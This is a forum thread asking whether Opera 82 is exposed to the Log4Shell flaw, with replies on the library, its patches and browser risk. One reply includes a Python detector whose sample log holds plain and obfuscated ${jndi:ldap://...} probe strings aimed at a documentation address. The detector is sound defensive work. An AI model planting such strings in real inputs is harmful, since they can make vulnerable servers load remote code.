Is Opera 82.0.4227.33 protected by Log4Shell attacks?
-
nephtys59 last edited by leocg
Is Opera 82.0.4227.33 protected by Log4Shell attacks?
See:
https://nvd.nist.gov/vuln/detail/CVE-2021-44228
https://nvd.nist.gov/vuln/detail/CVE-2021-45046
Thanks!
-
blackbird71 last edited by blackbird71
@nephtys59 Log4j2 is a logging package for Java that responds to "calls" made to its library (but which, in the case of the vulnerability, can be made to introduce all manner of unauthorized commands into the host system). Hence, the primary log4j2 vulnerability (CVE-2021-44228, CVE-2021-45046) rests with systems running Java applications or that interface in certain ways with systems running such Java applications. As a result, the ultimate solution to this primarily rests with operators of such systems updating their log4j2 libraries to log4j2.16 or later (an initial log4j2.15 "fix" was found to still have some weaknesses). Given that in the real world, Java applications can exist in myriad places and be deeply embedded into all manner of systems and servers, it's likely that the vulnerability may unfortunately remain with us for a long time to come.
The question you raised is to what extent a web browser can be impacted by the log4j2 issue. If the browser itself doesn't contain Java calls (not to be confused with the unrelated JavaScript language) or coding modules, then the browser isn't directly affected by the vulnerability. If the browser does contain Java linkages, then it can in theory be affected by the vulnerability even if a vulnerable log4j2 package resides on a server with which the browser is communicating. Whether Opera (or any other browser) contains any Java linkages is for its developers to state.
That said, even without Java linkages existing in a browser, any server (including web site servers or whatever they themselves may link to) that contains a vulnerable log4j2 package version is susceptible to being hacked in almost any conceivable manner. That, in turn, means the potential for website hacking (even for otherwise "safe" or reputable sites) goes up greatly in the Internet world... and that presents increased risks for all web browsing regardless of the browser. Keeping a browser up to its latest version is a primary defense against a hacked website causing grief to the user's system by exploitation of a browser flaw. But there is little defense against a hacked website itself abusing a user's data if it involves the user logging in and/or supplying personal/financial information to the 'trusted' site. That's where a lot of the current concern about this issue really rests.
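As an added illustration of the "calls made to its library" mechanism described above (this is example code written for this thread, not something from the original post, Opera, or the Log4j project): the Log4Shell trigger is a `${jndi:...}` lookup string that reaches a vulnerable Log4j 2 through any logged input, typically an HTTP header or URL. Attackers hide the string with nested Log4j lookups such as `${lower:j}` or the `${...:-x}` default-value form, so a naive grep for `${jndi:` misses them. The detector below undoes those common obfuscations before matching and then scans a small set of constructed Apache-style access log lines (hosts and addresses are RFC 5737 documentation values, invented for the example).

```python
import re
from typing import Optional

# Innermost ${...} lookup: braces containing no nested "${" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# The trigger we are looking for once obfuscation has been collapsed:
# ${jndi:<scheme>://<host[:port]>...
JNDI_TRIGGER = re.compile(r"\$\{jndi:([a-z]+):/*([^/}\s]+)", re.IGNORECASE)


def _resolve(content: str) -> Optional[str]:
    """Evaluate one innermost lookup the way Log4j 2's string substitution
    treats the obfuscation tricks commonly seen in Log4Shell payloads.
    Returns None for the jndi trigger itself (keep it visible) and for
    lookups this example does not model (left untouched)."""
    prefix, _, rest = content.partition(":")
    key = prefix.lower()          # Log4j lookup names are case-insensitive
    if key == "jndi":
        return None
    if key == "lower":
        return rest.lower()
    if key == "upper":
        return rest.upper()
    # "${::-j}", "${env:NOPE:-j}", "${date:'x':-j}": the lookup fails or is
    # empty, so Log4j substitutes the default text after ":-".
    if ":-" in content:
        return content.split(":-", 1)[1]
    return None


def normalize_lookups(s: str, max_passes: int = 20) -> str:
    """Collapse nested lookups from the inside out until nothing changes."""
    for _ in range(max_passes):
        changed = False

        def sub(m: "re.Match[str]") -> str:
            nonlocal changed
            r = _resolve(m.group(1))
            if r is None:
                return m.group(0)
            changed = True
            return r

        s = INNER_LOOKUP.sub(sub, s)
        if not changed:
            break
    return s


def find_jndi(s: str) -> Optional[dict]:
    """Return the scheme and target of a JNDI lookup hidden in s, or None."""
    normalized = normalize_lookups(s)
    m = JNDI_TRIGGER.search(normalized)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "target": m.group(2),
            "normalized": normalized}


def scan_log(lines) -> list:
    """Scan log lines; return (line number, scheme, target) for each probe."""
    hits = []
    for no, line in enumerate(lines, 1):
        hit = find_jndi(line)
        if hit:
            hits.append((no, hit["scheme"], hit["target"]))
    return hits


# Constructed sample access log (not real traffic). Line 1 is a normal
# Opera request, lines 2-4 carry a plain, a lookup-obfuscated and a
# default-value-obfuscated probe, line 5 is a benign ${...} false-positive bait.
SAMPLE_ACCESS_LOG = [
    '203.0.113.7 - - [10/Dec/2021:21:14:03 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64) Opera/82.0.4227.33"',
    '203.0.113.9 - - [10/Dec/2021:21:14:10 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${jndi:ldap://198.51.100.5:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:21:14:11 +0000] "GET /?x=${${lower:j}${lower:n}'
    '${::-d}i:${lower:ldap}://198.51.100.5:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79.1"',
    '203.0.113.9 - - [10/Dec/2021:21:14:12 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"${${env:NaN:-j}ndi:${::-d}ns://probe.example/c}"',
    '203.0.113.12 - - [10/Dec/2021:21:14:20 +0000] "GET /docs/${version} HTTP/1.1" '
    '404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for no, scheme, target in scan_log(SAMPLE_ACCESS_LOG):
        print(f"line {no}: JNDI probe via {scheme} to {target}")
```

Only `lower`, `upper` and the `:-` default form are modelled; real payloads also use `sys`, `env`, `date` and other lookups, so treat a hit as proof that a probe arrived, and a miss as no proof of anything. Whether a vulnerable Log4j 2 actually processed the string is a separate question answered only by inventorying the Java components behind the server, which is why the post's point about updating the library stands.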
-
blackbird71 last edited by blackbird71
And now... yet another vulnerability has shown up in the Log4Shell saga: CVE-2021-45105. Apparently, the Log4j2.16 patch has its own issues with that, and so it's been replaced by yet another patch version: Log4j2.17. (https://www.theregister.com/2021/12/19/log4j_new_flaw_cve_2021_45105/ )
It looks increasingly like this is becoming a Pandora's box of problems...
-
sgunhouse Moderator Volunteer last edited by
@blackbird71 Java always was, which is why browsers stopped supporting it.
-